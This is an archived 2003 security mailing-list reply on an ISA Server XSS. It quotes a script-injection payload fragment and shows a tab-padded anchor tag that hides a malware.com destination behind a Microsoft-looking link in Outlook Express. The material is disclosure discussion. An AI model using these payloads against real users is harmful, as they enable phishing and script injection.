Re: Microsoft ISA Server HTTP error handler XSS (TL#007)

http-equiv_at_excite.com
Date: 07/17/03

  • Next message: Yaakov Yehudi: "Re: Alert: Microsoft Security Bulletin - MS03-026" 
    Date:         Thu, 17 Jul 2003 02:27:13 -0000
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

     <!--

    http://=""%09onerror="document.scripts[0].src=%27http%5Cx3a%
    5Cx2f%
    5Cx2f

     -->

    This is very interesting. A side 'benefit' is that we can mask our
    true url with the same scheme.

    For an href in html in order to mask the true destination the <a
    href="....>bloatedcorp.com</a>, can be manipulated by trivial
    javascript to generate a custom representation in the status bar to
    fool our recipient should they 'hover' the mouse over the link.

    This can be defeated quite simply like so:

    <A href="http://%09%09%09%09%09%09%09
    09www.malware.com">http://www.microsoft.com>

    In an html mail message [default in Outlook Express] plus restricted
    zone in Outlook Express 6 [again default] where no scripting is
    allowed, the above link when presented to the recipient in an html
    email message, and tested by 'hovering' the mouse over it, yields
    nothing. Blank. Thereafter accepting the url, transports us to our
    site as required.

    End Call

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!

    With a growth rate exceeding 110%, the TICSA security practitioner
    certification is one of the hottest IT credentials available. And now, for
    a limited time, you can save 33% off of the TICSA certification exam! To
    learn more about the TICSA certification, and to register as a TICSA
    candidate online, just go to

    http://www.trusecure.com/offer/s0100/

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

  • Next message: Yaakov Yehudi: "Re: Alert: Microsoft Security Bulletin - MS03-026"

    Relevant Pages

    • FW: [Fwd: Re: AIM Password theft]
      ... This is just a simple exploit utilizing the Object Data vulnerability ... coupled with the GreyMagic no-script HTML ... Summer's Hottest Certification Just Got HOTTER! ... you can save 33% off of the TICSA certification exam! ...
      (NT-Bugtraq)
    • Re: Alert: Microsoft Security Bulletin - MS03-039
      ... The way that Microsoft patched the new RPC Part II vulnerability ... Summer's Hottest Certification Just Got HOTTER! ... To learn more about the TICSA certification, ...
      (NT-Bugtraq)
    • Windows 2000 server issue
      ... accurately parse the lists of vulnerable machines produced by the scan ... of addresses directly on the script. ... Summer's Hottest Certification Just Got HOTTER! ... you can save 33% off of the TICSA certification ...
      (NT-Bugtraq)
    • Re: Drivial Pursuit: Internet Explorer Browser & Your Files and Folders !
      ... The default Enhanced Security Configuration of IE ... access to files and folders on the local machine from the internet. ... With a growth rate exceeding 110%, the TICSA security practitioner certification is one of the hottest IT credentials available. ... And now, for a limited time, you can save 33% off of the TICSA certification exam! ...
      (NT-Bugtraq)
    • Re: Microsoft Numbering System
      ... the patch for each systems affected. ... in the right frame. ... Summer's Hottest Certification Just Got HOTTER! ... you can save 33% off of the TICSA certification exam! ...
      (NT-Bugtraq)